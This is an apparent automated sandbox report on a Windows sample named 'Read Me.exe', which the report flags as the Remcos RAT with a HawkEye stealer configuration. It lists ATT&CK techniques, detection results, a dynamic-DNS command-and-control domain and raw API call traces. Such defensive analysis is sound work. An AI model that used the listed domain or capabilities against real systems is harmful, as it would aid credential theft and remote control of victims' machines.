Loading ...

Play interactive tourEdit tour

Analysis Report Read Me.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:224564
Start date:22.04.2020
Start time:19:48:30
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 11m 4s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Read Me.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:20
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.phis.troj.spyw.evad.winEXE@35/10@2/2
EGA Information:
  • Successful, ratio: 50%
HDC Information:
  • Successful, ratio: 84.1% (good quality ratio 70.9%)
  • Quality average: 68.2%
  • Quality standard deviation: 37.1%
HCA Information:
  • Successful, ratio: 95%
  • Number of executed functions: 144
  • Number of non-executed functions: 302
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded IPs from analysis (whitelisted): 172.217.168.46, 216.58.215.238, 67.26.73.254, 8.253.95.249, 67.26.81.254, 8.248.131.254, 67.26.75.254, 2.18.68.82
  • Excluded domains from analysis (whitelisted): docs.google.com, fs.microsoft.com, audownload.windowsupdate.nsatc.net, drive.google.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
  • Execution Graph export aborted for target Dprgees.exe, PID 5088 because there are no executed function
  • Execution Graph export aborted for target Read Me.exe, PID 3156 because there are no executed function
  • Execution Graph export aborted for target mshta.exe, PID 4900 because there are no executed function
  • Execution Graph export aborted for target mshta.exe, PID 6080 because there are no executed function
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Remcos
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1Registry Run Keys / Startup Folder1Access Token Manipulation1Software Packing1Credential Dumping2System Time Discovery1Remote File Copy11Data from Local System1Data Encrypted1Uncommonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Replication Through Removable MediaExecution through API1Scheduled Task1Process Injection422Deobfuscate/Decode Files or Information1Credentials in Files3Account Discovery1Remote ServicesScreen Capture1Exfiltration Over Other Network MediumRemote File Copy11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDefacement1
External Remote ServicesGraphical User Interface11Modify Existing Service1Scheduled Task1Scripting1Input Capture121Security Software Discovery1Windows Remote ManagementEmail Collection11Automated ExfiltrationStandard Cryptographic Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseCommand-Line Interface11Application Shimming1Application Shimming1Obfuscated Files or Information2Credentials in Registry2System Service Discovery1Logon ScriptsInput Capture121Data EncryptedRemote Access Tools1SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationService Execution2New Service1New Service1Masquerading1Account ManipulationFile and Directory Discovery3Shared WebrootClipboard Data2Scheduled TransferStandard Non-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkScheduled Task1Modify Existing ServiceNew ServiceModify Registry1Brute ForceSystem Information Discovery46Third-party SoftwareScreen CaptureData Transfer Size LimitsStandard Application Layer Protocol2Jamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskVirtualization/Sandbox Evasion1Two-Factor Authentication InterceptionVirtualization/Sandbox Evasion1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionAccess Token Manipulation1Bash HistoryProcess Discovery3Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess Injection422Input PromptApplication Window Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationScriptingKeychainSystem Owner/User Discovery1Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact
Hardware AdditionsExecution through APIFile System Permissions WeaknessValid AccountsIndicator Removal from ToolsPrivate KeysRemote System Discovery1Replication Through Removable MediaVideo CaptureStandard Application Layer ProtocolCommunication Through Removable MediaDisk Structure Wipe

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Found malware configurationShow sources
Source: ieinstal.exe.5692.12.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
Multi AV Scanner detection for domain / URLShow sources
Source: u864246.nsupdate.infoVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Read Me.exeVirustotal: Detection: 13%Perma Link
Source: Read Me.exeReversingLabs: Detection: 22%
Yara detected Remcos RATShow sources
Source: Yara matchFile source: 0000000C.00000002.1501343560.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1155859382.0000000004488000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1156091157.00000000044E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1136853129.00000000047AF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1187525190.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1136736873.000000000478F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1187354967.0000000002BD8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000013.00000002.1180206351.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1154726016.0000000004250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1186754617.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Read Me.exe PID: 3156, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5756, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Dprgees.exe PID: 4032, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Dprgees.exe PID: 5088, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5692, type: MEMORY
Source: Yara matchFile source: 11.2.Dprgees.exe.44e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 11.2.Dprgees.exe.44e0000.5.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.Dprgees.exe.2c20000.5.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.Dprgees.exe.2c20000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 19.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 19.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\Dprg\Dprgees.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: Read Me.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 18.2.Dprgees.exe.2c20000.5.unpackAvira: Label: BDS/Backdoor.Gen
Source: 11.2.Dprgees.exe.44e0000.5.unpackAvira: Label: BDS/Backdoor.Gen
Source: 12.2.ieinstal.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
Source: 19.2.ieinstal.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00404268 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,10_2_00404268
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040740F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040740F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004104E0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t12_2_004104E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00407183 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00407183
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00404648 _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA12_2_00404648
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004126D3 wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_004126D3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00404AD4 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00404AD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403315 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00403315
